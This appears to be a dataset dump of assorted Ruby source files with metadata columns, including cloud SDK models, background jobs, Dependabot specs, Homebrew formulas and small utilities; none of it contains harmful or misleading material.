hexsha (stringlengths 40-40) | size (int64 2-1.01M) | content (stringlengths 2-1.01M) | avg_line_length (float64 1.5-100) | max_line_length (int64 2-1k) | alphanum_fraction (float64 0.25-1)
---|---|---|---|---|---
e9aefe9e3b59c529c8936236ea94e7b078802d86 | 6,437 | # Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
require 'date'
# rubocop:disable Lint/UnneededCopDisableDirective, Metrics/LineLength
module OCI
# The shape used to launch instances associated with the dedicated VM host.
#
class Core::Models::DedicatedVmHostInstanceShapeSummary
# The shape's availability domain.
#
# @return [String]
attr_accessor :availability_domain
# **[Required]** The name of the virtual machine instance shapes that can be launched on a dedicated VM host.
#
# @return [String]
attr_accessor :instance_shape_name
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
# rubocop:disable Style/SymbolLiteral
'availability_domain': :'availabilityDomain',
'instance_shape_name': :'instanceShapeName'
# rubocop:enable Style/SymbolLiteral
}
end
# Attribute type mapping.
def self.swagger_types
{
# rubocop:disable Style/SymbolLiteral
'availability_domain': :'String',
'instance_shape_name': :'String'
# rubocop:enable Style/SymbolLiteral
}
end
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:disable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
# @option attributes [String] :availability_domain The value to assign to the {#availability_domain} property
# @option attributes [String] :instance_shape_name The value to assign to the {#instance_shape_name} property
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
self.availability_domain = attributes[:'availabilityDomain'] if attributes[:'availabilityDomain']
raise 'You cannot provide both :availabilityDomain and :availability_domain' if attributes.key?(:'availabilityDomain') && attributes.key?(:'availability_domain')
self.availability_domain = attributes[:'availability_domain'] if attributes[:'availability_domain']
self.instance_shape_name = attributes[:'instanceShapeName'] if attributes[:'instanceShapeName']
raise 'You cannot provide both :instanceShapeName and :instance_shape_name' if attributes.key?(:'instanceShapeName') && attributes.key?(:'instance_shape_name')
self.instance_shape_name = attributes[:'instance_shape_name'] if attributes[:'instance_shape_name']
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:enable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# Checks equality by comparing each attribute.
# @param [Object] other the other object to be compared
def ==(other)
return true if equal?(other)
self.class == other.class &&
availability_domain == other.availability_domain &&
instance_shape_name == other.instance_shape_name
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# @see the `==` method
# @param [Object] other the other object to be compared
def eql?(other)
self == other
end
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[availability_domain, instance_shape_name].hash
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /^Array<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
public_method("#{key}=").call(
attributes[self.class.attribute_map[key]]
.map { |v| OCI::Internal::Util.convert_to_type(Regexp.last_match(1), v) }
)
end
elsif !attributes[self.class.attribute_map[key]].nil?
public_method("#{key}=").call(
OCI::Internal::Util.convert_to_type(type, attributes[self.class.attribute_map[key]])
)
end
# or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = public_method(attr).call
next if value.nil? && !instance_variable_defined?("@#{attr}")
hash[param] = _to_hash(value)
end
hash
end
private
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
# rubocop:enable Lint/UnneededCopDisableDirective, Metrics/LineLength
| 37.424419 | 245 | 0.689762 |
bf17941eb84e995664d6079087df9b4dd20f0a9b | 987 | # encoding: utf-8
require 'sequel'
module Resque
class BaseJob
MAX_RETRIES = 3
@@queue = ''
@@retries = 0
def self.perform(options = {})
raise NotImplementedError, "This class shouldn't be directly instantiated"
end
def self.run_action(options, queue_name, action)
@@queue = queue_name
begin
action.call(options)
rescue Sequel::DatabaseDisconnectError => e
puts "Job got a DatabaseDisconnectError: #{e.message}"
regexps = [ /server has gone away/, /decryption failed or bad record mac/, /SSL SYSCALL error: EOF detected/ ]
match_found = regexps.map { |regexp| regexp.match(e.message) }.any? { |matches| matches }
if (match_found)
@@retries += 1
if (@@retries < MAX_RETRIES)
puts 'Retrying job'
retry
else
raise e
end
else
raise e
end
end
end #self.perform
end #BaseJobs
end | 24.073171 | 118 | 0.5846 |
6aefa7d38b6526a94a223b3c181f0ac5392ff60e | 264 | module SocialStream
module Events
module Models
module Actor
extend ActiveSupport::Concern
included do
has_many :rooms
end
def events
Event.authored_by(self)
end
end
end
end
end
| 14.666667 | 37 | 0.564394 |
e9e178ffdbe4326965fcb06bb96a8fa6a88d25cb | 278 | #!/usr/bin/env ruby
# by Andronik Ordian
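# Greedily adds each weight, in the given order, as long as the running total stays within capacity w.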
def optimal_weight(w, weights)
result = 0
weights.each { |weight| result += weight if result + weight <= w }
result
end
if __FILE__ == $0
w, _, *weights = STDIN.read.split().map(&:to_i)
puts optimal_weight(w, weights)
end
| 18.533333 | 68 | 0.661871 |
3841f54222b2ca7defd6d67c28277724f62d6b9d | 2,561 | # rubocop:disable all
require 'flows'
require 'dry/transaction'
require 'trailblazer/operation'
#
# Task: a + b = ?
#
class FlowsSummator
include Flows::Operation
step :sum
ok_shape :sum
def sum(a:, b:, **)
ok(sum: a + b)
end
end
class POROSummator
def self.call(a:, b:)
a + b
end
end
class DrySummator
include Dry::Transaction
step :sum
private
def sum(a:, b:)
Success(a + b)
end
end
class TBSummator < Trailblazer::Operation
step :sum
def sum(opts, a:, b:, **)
opts[:sum] = a + b
end
end
#
# Task: 10 steps which returs simple value
#
class FlowsTenSteps
include Flows::Operation
step :s1
step :s2
step :s3
step :s4
step :s5
step :s6
step :s7
step :s8
step :s9
step :s10
ok_shape :data
def s1(**); ok(s1: true); end
def s2(**); ok(s2: true); end
def s3(**); ok(s3: true); end
def s4(**); ok(s4: true); end
def s5(**); ok(s5: true); end
def s6(**); ok(s6: true); end
def s7(**); ok(s7: true); end
def s8(**); ok(s8: true); end
def s9(**); ok(s9: true); end
def s10(**); ok(data: :ok); end
end
class POROTenSteps
class << self
def call()
s1
s2
s3
s4
s5
s6
s7
s8
s9
s10
end
def s1; true; end
def s2; true; end
def s3; true; end
def s4; true; end
def s5; true; end
def s6; true; end
def s7; true; end
def s8; true; end
def s9; true; end
def s10; true; end
end
end
class DryTenSteps
include Dry::Transaction
step :s1
step :s2
step :s3
step :s4
step :s5
step :s6
step :s7
step :s8
step :s9
step :s10
private
def s1; Success(true); end
def s2; Success(true); end
def s3; Success(true); end
def s4; Success(true); end
def s5; Success(true); end
def s6; Success(true); end
def s7; Success(true); end
def s8; Success(true); end
def s9; Success(true); end
def s10; Success(true); end
end
class TBTenSteps < Trailblazer::Operation
step :s1
step :s2
step :s3
step :s4
step :s5
step :s6
step :s7
step :s8
step :s9
step :s10
def s1(opts, **); opts[:s1] = true; end
def s2(opts, **); opts[:s2] = true; end
def s3(opts, **); opts[:s3] = true; end
def s4(opts, **); opts[:s4] = true; end
def s5(opts, **); opts[:s5] = true; end
def s6(opts, **); opts[:s6] = true; end
def s7(opts, **); opts[:s7] = true; end
def s8(opts, **); opts[:s8] = true; end
def s9(opts, **); opts[:s9] = true; end
def s10(opts, **); opts[:s10] = true; end
end
| 16.00625 | 43 | 0.574385 |
ff13942d5527ee0e3cd51ef4b8028e04d661ee57 | 99 | module Reviewit
autoload :App, 'reviewit/app.rb'
autoload :GitUtil, 'reviewit/git_util.rb'
end
| 19.8 | 43 | 0.747475 |
1171f32bb104b933ff139b70c7f5905f9d0364b9 | 14,272 | # frozen_string_literal: true
require "spec_helper"
require "dependabot/dependency"
require "dependabot/dependency_file"
require "dependabot/maven/file_updater/declaration_finder"
RSpec.describe Dependabot::Maven::FileUpdater::DeclarationFinder do
let(:finder) do
described_class.new(
dependency: dependency,
declaring_requirement: declaring_requirement,
dependency_files: dependency_files
)
end
let(:dependency) do
Dependabot::Dependency.new(
name: dependency_name,
version: dependency_version,
requirements: [declaring_requirement],
package_manager: "maven"
)
end
let(:dependency_name) { "org.apache.httpcomponents:httpclient" }
let(:dependency_version) { "4.5.3" }
let(:dependency_metadata) { { packaging_type: "jar" } }
let(:declaring_requirement) do
{
requirement: dependency_version,
file: "pom.xml",
groups: [],
source: nil,
metadata: dependency_metadata
}
end
let(:dependency_files) { [pom] }
let(:pom) do
Dependabot::DependencyFile.new(
name: "pom.xml",
content: fixture("poms", pom_fixture_name)
)
end
let(:pom_fixture_name) { "basic_pom.xml" }
describe "#declaration_nodes" do
subject(:declaration_nodes) { finder.declaration_nodes }
context "with a dependency in the dependencies node" do
let(:pom_fixture_name) { "basic_pom.xml" }
it "finds the declaration" do
expect(declaration_nodes.count).to eq(1)
declaration_node = declaration_nodes.first
expect(declaration_node).to be_a(Nokogiri::XML::Node)
expect(declaration_node.at_css("version").content).to eq("4.5.3")
expect(declaration_node.at_css("artifactId").content).
to eq("httpclient")
expect(declaration_node.at_css("groupId").content).
to eq("org.apache.httpcomponents")
end
end
context "with a dependency in the dependency management node" do
let(:pom_fixture_name) { "dependency_management_pom.xml" }
it "finds the declaration" do
expect(declaration_nodes.count).to eq(1)
declaration_node = declaration_nodes.first
expect(declaration_node).to be_a(Nokogiri::XML::Node)
expect(declaration_node.at_css("version").content).to eq("4.5.3")
expect(declaration_node.at_css("artifactId").content).
to eq("httpclient")
expect(declaration_node.at_css("groupId").content).
to eq("org.apache.httpcomponents")
end
end
context "with a dependency in the parent node" do
let(:pom_fixture_name) { "pom_with_parent.xml" }
let(:dependency_name) do
"org.springframework.boot:spring-boot-starter-parent"
end
let(:dependency_version) { "1.5.9.RELEASE" }
let(:dependency_metadata) { { packaging_type: "pom" } }
it "finds the declaration" do
expect(declaration_nodes.count).to eq(1)
declaration_node = declaration_nodes.first
expect(declaration_node).to be_a(Nokogiri::XML::Node)
expect(declaration_node.at_css("version").content).
to eq("1.5.9.RELEASE")
expect(declaration_node.at_css("artifactId").content).
to eq("spring-boot-starter-parent")
expect(declaration_node.at_css("groupId").content).
to eq("org.springframework.boot")
end
end
context "with a dependency in the plugins node" do
let(:pom_fixture_name) { "plugin_dependencies_pom.xml" }
let(:dependency_name) { "org.jacoco:jacoco-maven-plugin" }
let(:dependency_version) { "0.7.9" }
it "finds the declaration" do
expect(declaration_nodes.count).to eq(1)
declaration_node = declaration_nodes.first
expect(declaration_node).to be_a(Nokogiri::XML::Node)
expect(declaration_node.at_css("version").content).to eq("0.7.9")
expect(declaration_node.at_css("artifactId").content).
to eq("jacoco-maven-plugin")
expect(declaration_node.at_css("groupId").content).to eq("org.jacoco")
end
context "missing a groupId" do
let(:pom_fixture_name) { "plugin_dependencies_missing_group_id.xml" }
let(:dependency_name) do
"org.apache.maven.plugins:spring-boot-maven-plugin"
end
let(:dependency_version) { "1.5.8.RELEASE" }
it "finds the declaration" do
expect(declaration_nodes.count).to eq(1)
declaration_node = declaration_nodes.first
expect(declaration_node).to be_a(Nokogiri::XML::Node)
expect(declaration_node.at_css("version").content).
to eq("1.5.8.RELEASE")
expect(declaration_node.at_css("artifactId").content).
to eq("spring-boot-maven-plugin")
expect(declaration_node.at_css("groupId")).to be_nil
end
end
end
context "with a dependency in the extensions node" do
let(:pom_fixture_name) { "extension_dependencies_pom.xml" }
let(:dependency_name) { "org.jacoco:jacoco-maven-extension" }
let(:dependency_version) { "0.7.9" }
it "finds the declaration" do
expect(declaration_nodes.count).to eq(1)
declaration_node = declaration_nodes.first
expect(declaration_node).to be_a(Nokogiri::XML::Node)
expect(declaration_node.at_css("version").content).to eq("0.7.9")
expect(declaration_node.at_css("artifactId").content).
to eq("jacoco-maven-extension")
expect(declaration_node.at_css("groupId").content).to eq("org.jacoco")
end
end
context "with a dependency in the pluginManagement node" do
let(:pom_fixture_name) { "plugin_management_dependencies_pom.xml" }
let(:dependency_name) { "org.jacoco:jacoco-maven-plugin" }
let(:dependency_version) { "0.7.9" }
it "finds the declaration" do
expect(declaration_nodes.count).to eq(1)
declaration_node = declaration_nodes.first
expect(declaration_node).to be_a(Nokogiri::XML::Node)
expect(declaration_node.at_css("version").content).to eq("0.7.9")
expect(declaration_node.at_css("artifactId").content).
to eq("jacoco-maven-plugin")
expect(declaration_node.at_css("groupId").content).to eq("org.jacoco")
end
end
context "with a nested dependency" do
let(:pom_fixture_name) { "nested_dependency_pom.xml" }
let(:dependency_name) { "com.puppycrawl.tools:checkstyle" }
let(:dependency_version) { "8.2" }
let(:dependency_metadata) do
{ property_name: "checkstyle.version", packaging_type: "jar" }
end
it "finds the declaration" do
expect(declaration_nodes.count).to eq(1)
declaration_node = declaration_nodes.first
expect(declaration_node).to be_a(Nokogiri::XML::Node)
expect(declaration_node.at_css("version").content).
to eq("${checkstyle.version}")
expect(declaration_node.at_css("artifactId").content).
to eq("checkstyle")
expect(declaration_node.at_css("groupId").content).
to eq("com.puppycrawl.tools")
end
end
context "with a plugin within a plugin" do
let(:pom_fixture_name) { "plugin_within_plugin.xml" }
let(:dependency_name) { "jp.skypencil.findbugs.slf4j:bug-pattern" }
let(:dependency_version) { "1.4.0" }
it "finds the declaration" do
expect(declaration_nodes.count).to eq(1)
declaration_node = declaration_nodes.first
expect(declaration_node).to be_a(Nokogiri::XML::Node)
expect(declaration_node.at_css("version").content).
to eq("1.4.0")
expect(declaration_node.at_css("artifactId").content).
to eq("bug-pattern")
expect(declaration_node.at_css("groupId").content).
to eq("jp.skypencil.findbugs.slf4j")
end
end
context "with a repeated dependency" do
let(:pom_fixture_name) { "repeated_pom_same_version.xml" }
let(:dependency_name) { "org.apache.maven.plugins:maven-javadoc-plugin" }
let(:dependency_version) { "2.10.4" }
it "finds the declaration" do
expect(declaration_nodes.count).to eq(1)
declaration_node = declaration_nodes.first
expect(declaration_node).to be_a(Nokogiri::XML::Node)
expect(declaration_node.at_css("version").content).
to eq("2.10.4")
expect(declaration_node.at_css("artifactId").content).
to eq("maven-javadoc-plugin")
expect(declaration_node.at_css("groupId").content).
to eq("org.apache.maven.plugins")
end
context "where the versions are identical" do
let(:pom_fixture_name) { "repeated_pom_identical.xml" }
it "finds the declaration" do
expect(declaration_nodes.count).to eq(2)
expect(declaration_nodes.first.to_s).to include("dependency")
expect(declaration_nodes.last.to_s).to include("plugin")
expect(declaration_nodes.first).to be_a(Nokogiri::XML::Node)
expect(declaration_nodes.first.at_css("version").content).
to eq("2.10.4")
expect(declaration_nodes.first.at_css("artifactId").content).
to eq("maven-javadoc-plugin")
expect(declaration_nodes.first.at_css("groupId").content).
to eq("org.apache.maven.plugins")
end
context "but differ by distribution type" do
let(:pom_fixture_name) { "repeated_pom_multiple_types.xml" }
it "finds the declaration" do
expect(declaration_nodes.count).to eq(1)
expect(declaration_nodes.first).to be_a(Nokogiri::XML::Node)
expect(declaration_nodes.first.at_css("type")).to be_nil
end
context "looking for the bespoke type" do
let(:dependency_metadata) { { packaging_type: "test-jar" } }
it "finds the declaration" do
expect(declaration_nodes.count).to eq(1)
expect(declaration_nodes.first).to be_a(Nokogiri::XML::Node)
expect(declaration_nodes.first.at_css("type").content).
to eq("test-jar")
end
end
end
end
end
context "with a groupId property" do
let(:dependency_files) { [pom, child_pom] }
let(:pom) do
Dependabot::DependencyFile.new(
name: "pom.xml",
content: fixture("poms", "sigtran.pom")
)
end
let(:child_pom) do
Dependabot::DependencyFile.new(
name: "map/pom.xml",
content: fixture("poms", "sigtran-map.pom")
)
end
let(:dependency_name) { "uk.me.lwood.sigtran:sigtran-tcap" }
let(:dependency_version) { "0.9-SNAPSHOT" }
let(:declaring_requirement) do
{
requirement: dependency_version,
file: "map/pom.xml",
groups: [],
source: nil,
metadata: { property_name: "project.version", packaging_type: "jar" }
}
end
it "finds the declaration" do
expect(declaration_nodes.count).to eq(1)
declaration_node = declaration_nodes.first
expect(declaration_node).to be_a(Nokogiri::XML::Node)
expect(declaration_node.at_css("version").content).
to eq("${project.version}")
expect(declaration_node.at_css("artifactId").content).
to eq("sigtran-tcap")
expect(declaration_node.at_css("groupId").content).
to eq("${project.groupId}")
end
context "that is missing for an unrelated dependency" do
let(:dependency_files) { [pom] }
let(:pom) do
Dependabot::DependencyFile.new(
name: "pom.xml",
content: fixture("poms", "missing_property_group_id.xml")
)
end
let(:dependency_name) { "io.reactivex.rxjava2:rxjava" }
let(:dependency_version) { "2.1.6" }
let(:declaring_requirement) do
{
requirement: dependency_version,
file: "pom.xml",
groups: [],
source: nil,
metadata: { packaging_type: "jar" }
}
end
it "finds the declaration" do
expect(declaration_nodes.count).to eq(1)
declaration_node = declaration_nodes.first
expect(declaration_node).to be_a(Nokogiri::XML::Node)
expect(declaration_node.at_css("version").content).to eq("2.1.6")
expect(declaration_node.at_css("artifactId").content).to eq("rxjava")
expect(declaration_node.at_css("groupId").content).
to eq("io.reactivex.rxjava2")
end
end
end
context "with an inherited property" do
let(:dependency_files) { [pom, child_pom, grandchild_pom] }
let(:pom) do
Dependabot::DependencyFile.new(
name: "pom.xml",
content: fixture("poms", "multimodule_pom.xml")
)
end
let(:child_pom) do
Dependabot::DependencyFile.new(
name: "legacy/pom.xml",
content: fixture("poms", "legacy_pom.xml")
)
end
let(:grandchild_pom) do
Dependabot::DependencyFile.new(
name: "legacy/some-spring-project/pom.xml",
content: fixture("poms", "some_spring_project_pom.xml")
)
end
let(:dependency_name) { "org.springframework:spring-aop" }
let(:dependency_version) { "2.5.6" }
let(:dependency_metadata) do
{ property_name: "spring.version", packaging_type: "jar" }
end
let(:declaring_requirement) do
{
requirement: dependency_version,
file: "legacy/some-spring-project/pom.xml",
groups: [],
source: nil,
metadata: dependency_metadata
}
end
it "finds the declaration" do
expect(declaration_nodes.count).to eq(1)
declaration_node = declaration_nodes.first
expect(declaration_node).to be_a(Nokogiri::XML::Node)
expect(declaration_node.at_css("version").content).
to eq("${spring.version}")
expect(declaration_node.at_css("artifactId").content).
to eq("spring-aop")
expect(declaration_node.at_css("groupId").content).
to eq("org.springframework")
end
end
end
end
| 35.859296 | 79 | 0.6353 |
f7b25e7a87156669d3265efcb4482a6cd85f6b5b | 1,785 | require 'test_helper'
class AgentsIndexTest < ActionDispatch::IntegrationTest
def setup
@admin = agents(:michael)
@agent = agents(:archer)
end
test "index as admin including pagination with edit and delete links and a button to add a new agent" do
log_in_as(@admin)
get agents_path
assert_template 'agents/index'
# Only an admin can add a new agent
assert_select 'form[action=?]', new_agent_path, text: "Add a new agent", count: 1
assert_select 'div.pagination'
first_page_of_agents = Agent.paginate(page: 1)
first_page_of_agents.each do |agent|
assert_select 'a[href=?]', agent_path(agent), text: agent.name
unless agent == @admin
assert_select 'a[href=?][data-method="delete"]', agent_path(agent), method: :delete, count: 1
end
assert_select 'a[href=?]', edit_agent_path(agent), method: :edit
end
assert_difference 'Agent.count', -1 do
delete agent_path(@agent)
end
end
test "index as non-admin" do
log_in_as(@agent)
get agents_path
assert_template 'agents/index'
# Only an admin can add a new agent
assert_select 'form[action=?]', new_agent_path, text: "Add a new agent", count: 0
assert_select 'div.pagination'
first_page_of_agents = Agent.paginate(page: 1)
first_page_of_agents.each do |agent|
assert_select 'a[href=?][data-method="delete"]', agent_path(agent), count: 0
# An agent can edit his own profile
if agent == @agent
# There are two edit links: one to the left of the agent link and one
# under the Account dropdown menu
assert_select 'a[href=?]', edit_agent_path(agent), count: 2
else
assert_select 'a[href=?]', edit_agent_path(agent), count: 0
end
end
end
end
| 33.055556 | 106 | 0.673389 |
218c11552175a0bcb10ec01411c487433fc70a56 | 973 | module MoneyS3
module Parsers
class VyrobniCislo
include ParserCore::BaseParser
def vyrobni_cis
at 'VyrobniCis'
end
def vyrobni_cis_attributes
attributes_at 'VyrobniCis'
end
def dat_vyr
at 'DatVyr'
end
def dat_vyr_attributes
attributes_at 'DatVyr'
end
def car_kod
at 'CarKod'
end
def car_kod_attributes
attributes_at 'CarKod'
end
def to_h
hash = {}
hash[:attributes] = attributes
hash[:vyrobni_cis] = vyrobni_cis if has? 'VyrobniCis'
hash[:vyrobni_cis_attributes] = vyrobni_cis_attributes if has? 'VyrobniCis'
hash[:dat_vyr] = dat_vyr if has? 'DatVyr'
hash[:dat_vyr_attributes] = dat_vyr_attributes if has? 'DatVyr'
hash[:car_kod] = car_kod if has? 'CarKod'
hash[:car_kod_attributes] = car_kod_attributes if has? 'CarKod'
hash
end
end
end
end | 21.622222 | 83 | 0.609455 |
03c107141c507c18cc5c42ab02e35f960354e2be | 401 | # encoding: UTF-8
# frozen_string_literal: true
module BlockchainClient
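# Client for the Xano daemon, which exposes a Bitcoin-compatible JSON-RPC interface.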
class Xano < Bitcoin
def get_block(block_hash)
json_rpc(:getblock, [block_hash, true]).fetch('result')
end
def get_raw_transaction(txid)
json_rpc(:getrawtransaction, [txid, 1]).fetch('result')
end
def get_unconfirmed_txns
json_rpc(:getrawmempool).fetch('result')
end
end
end
| 20.05 | 61 | 0.685786 |
bb822ab91b491c40776ff4c822a0dff2696908c6 | 1,329 | require 'terjira/utils/file_cache'
module Terjira
VERSION = '0.4.1'.freeze
class VersionChecker
VERSION_CHECK_DURATION = (60 * 60 * 24 * 5).freeze
class << self
def check_version
version_alert_cache.fetch :alert do
if new_version_exists?
puts "* New version of terjira was released! Run `gem update terjira` if you want to update"
end
'checked!'
end
end
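# Compares the locally installed Terjira::VERSION against the latest release parsed from `gem search terjira`.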
def new_version_exists?
current = Terjira::VERSION.split(".").map(&:to_i)
remote = parse_remote_version
(current[0] < remote[0]) ||
((current[0] == remote[0]) && (current[1] < remote[1])) ||
((current[0] == remote[0]) && (current[1] == remote[1]) && (current[2] < remote[2]))
rescue => e
puts "Can not check new version of terjira, #{e.message}"
false
end
private
def parse_remote_version
remote_version = search_remote_version
(remote_version.scan(/(?<=terjira\s\()\d+\.\d+\.\d+/).first || '0.0.0').split(".").map(&:to_i)
end
def search_remote_version
@remote_version_str ||= `gem search terjira`
end
def version_alert_cache
@version_alert_cache ||= Terjira::FileCache.new("version", VERSION_CHECK_DURATION)
end
end
end
end
| 27.122449 | 104 | 0.586907 |
39b681175c83b338886f7a758d3d4538128d87b4 | 2,071 | class Libscrypt < Formula
desc "Library for scrypt"
homepage "https://lolware.net/libscrypt.html"
url "https://github.com/technion/libscrypt/archive/v1.21.tar.gz"
sha256 "68e377e79745c10d489b759b970e52d819dbb80dd8ca61f8c975185df3f457d3"
license "BSD-2-Clause"
bottle do
sha256 cellar: :any, arm64_big_sur: "1073aa38a72ed089bf6e6a6a4fbddb6e6123b394e7562d1e1ad5b26cc67906dd"
sha256 cellar: :any, big_sur: "c2c67b09b54467e47709dbe7340c1916e0802a5423b4f2224156ce7bb977e389"
sha256 cellar: :any, catalina: "66ea017c5361346903add978ce85b09a2a6f2e8eabdf9fb2cfb58809da1d29cd"
sha256 cellar: :any, mojave: "81c603f27fbda0bde330506d2745f62d3ba16d3290addc5f1eeecbcd110aa801"
sha256 cellar: :any, high_sierra: "46cf17f2a05e5e418822a306899de14be3fbdfe71fc017f6eb1169fc3ad1de3a"
sha256 cellar: :any, sierra: "3adc43863f9b966dcecd89f507a4706891f94129dd88ba810ed0269278e931cf"
sha256 cellar: :any, el_capitan: "bc2c8318384a72f82802937f7e6dd8017ec44fb6fc94583e5f0c38056e1a660c"
sha256 cellar: :any, yosemite: "0e870b01dbbfc49432cc8ea81c90ee6d8732b6d8adc4665368844536d5c6e092"
sha256 cellar: :any, mavericks: "fe3bc1ca8b19e7c86e103f1345cb9294da01cc15b950302ad5486ef49b2b212d"
sha256 cellar: :any, x86_64_linux: "b02209e5c778dcfdd9e13123d9ce258f909f583ce5e0b474d916bb4ea1c48293"
end
def install
if OS.mac?
system "make", "install-osx", "PREFIX=#{prefix}", "LDFLAGS=", "CFLAGS_EXTRA="
system "make", "check", "LDFLAGS=", "CFLAGS_EXTRA="
else
system "make"
system "make", "check"
lib.install "libscrypt.a", "libscrypt.so", "libscrypt.so.0"
include.install "libscrypt.h"
prefix.install "libscrypt.version"
end
end
test do
(testpath/"test.c").write <<~EOS
#include <libscrypt.h>
int main(void) {
char buf[SCRYPT_MCF_LEN];
libscrypt_hash(buf, "Hello, Homebrew!", SCRYPT_N, SCRYPT_r, SCRYPT_p);
}
EOS
system ENV.cc, "test.c", "-L#{lib}", "-lscrypt", "-o", "test"
system "./test"
end
end
| 45.021739 | 106 | 0.733462 |
87c4d264c2f9af078eafbd6e83558745ee3ae309 | 877 | require 'test_helper'
module Rubybear
class StreamTest < Rubybear::Test
def setup
@api = Rubybear::Stream.new
end
def test_method_missing
assert_raises NoMethodError do
@api.bogus
end
end
def test_all_respond_to
@api.method_names.each do |key|
assert @api.respond_to?(key), "expect rpc respond to #{key}"
end
end
def test_all_methods
skip "cannot execute an asynchronous request in tests"
vcr_cassette('all_methods') do
@api.method_names.each do |key|
assert @api.send key
end
end
end
def test_get_operations
skip "cannot execute an asynchronous request in tests"
vcr_cassette('get_operations') do
response = @api.operations
assert_equal Hashie::Mash, response.class, response.inspect
end
end
end
end
| 21.390244 | 68 | 0.63512 |
285c2b03cfae5afccdafcf7d506934d683fb917e | 1,348 | $LOAD_PATH.push File.expand_path('../lib', __FILE__)
# Maintain your gem's version:
require 'care_bert/version'
# Describe your gem and declare its dependencies:
Gem::Specification.new do |s|
s.name = 'care_bert'
s.version = CareBert::VERSION
s.authors = ['Daniel Loy']
s.email = ['[email protected]']
s.homepage = 'https://github.com/loybert/care_bert'
s.summary = 'CareBert takes care of the validation state of your current database items'
s.description = 'CareBert analyzes the current items of your database and performs differing validation and integrity tests. Currently it supports following checks: \n - Table Integrity => check each single model-instance of all available tables can be loaded \n - Model Validation => triggers the validation of each single model-instance (which results might have changed due code-modifications) \n - Missing Assocs => tries to load each instance of an assoc, if the foreign_key is set (having a present FK doesn\'t mean it really has the targeted model available)'
s.license = 'MIT'
s.files = Dir['{app,config,db,lib}/**/*', 'MIT-LICENSE', 'Rakefile', 'README.md']
s.require_paths = ['lib']
s.test_files = Dir['test/**/*']
s.add_dependency 'rails', '~> 3'
s.add_development_dependency 'sqlite3'
s.add_development_dependency 'rubocop'
end
| 51.846154 | 568 | 0.719585 |
e23dbcae753b2c754315f82d340c25a30f858035 | 754 | # frozen_string_literal: true
class Zendesk2::Search
include Zendesk2::Request
request_method :get
request_body { |r| { query: r.query } }
request_path { |_| '/search.json' }
page_params!
attr_reader :query
def call(query, params)
@query = query
super(params)
end
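# In-memory mock: treats the query as space-separated field:value terms, optionally scopes to the pluralized :type collection, and pages over records matching every remaining term.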
def mock
terms = Hash[query.split(' ').map { |t| t.split(':') }]
type = terms.delete('type')
collection = if type.nil?
cistern.data.values
else
cistern.data[pluralize(type).to_sym]
end
results = collection.values.select { |v| terms.all? { |term, condition| v[term].to_s == condition.to_s } }
page(results, params: { 'query' => query }, root: 'results')
end
end
| 22.848485 | 110 | 0.588859 |
187d3de20e33e33991ab85551c44901b514d9349 | 157 | class AddPasswordSaltToUsers < ActiveRecord::Migration
def change
add_column :users, :password_salt, :string, :null => false, :default => ''
end
end
| 26.166667 | 78 | 0.719745 |
e9e9a21b90dc742feed28c3e86d868514fa18b32 | 852 | cask 'detectx' do
version '2.73'
sha256 '9422a1cffd1c3ea7786c80cd767a373983ad788fc4aa5138e69c15163a79df7a'
# amazonaws.com/sqwarq.com was verified as official when first introduced to the cask
url 'https://s3.amazonaws.com/sqwarq.com/PublicZips/DetectX.app.zip'
appcast 'https://s3.amazonaws.com/sqwarq.com/AppCasts/detectx.xml',
checkpoint: 'bcec948fa366840877cdb2d52b5016404642f04f92e5f6a18ff189ea020baafb'
name 'DetectX'
homepage 'https://sqwarq.com/detectx/'
auto_updates true
app 'DetectX.app'
zap delete: [
'~/Library/Application Support/com.sqwarq.DetectX',
'~/Library/Application Support/com.apple.sharedfilelist/com.apple.LSSharedFileList.ApplicationRecentDocuments/com.sqwarq.detectx.sfl',
'~/Library/Preferences/com.sqwarq.DetectX.plist',
]
end
| 38.727273 | 150 | 0.728873 |
79c762f230069547a2417e068fcc856882e2ef27 | 6,068 | # http://linux.die.net/man/5/rackspace_yum.conf
case node['platform_version'].to_i
when 5
default['rackspace_yum']['main']['cachedir'] = '/var/cache/yum'
else
default['rackspace_yum']['main']['cachedir'] = '/var/cache/yum/$basearch/$releasever'
end
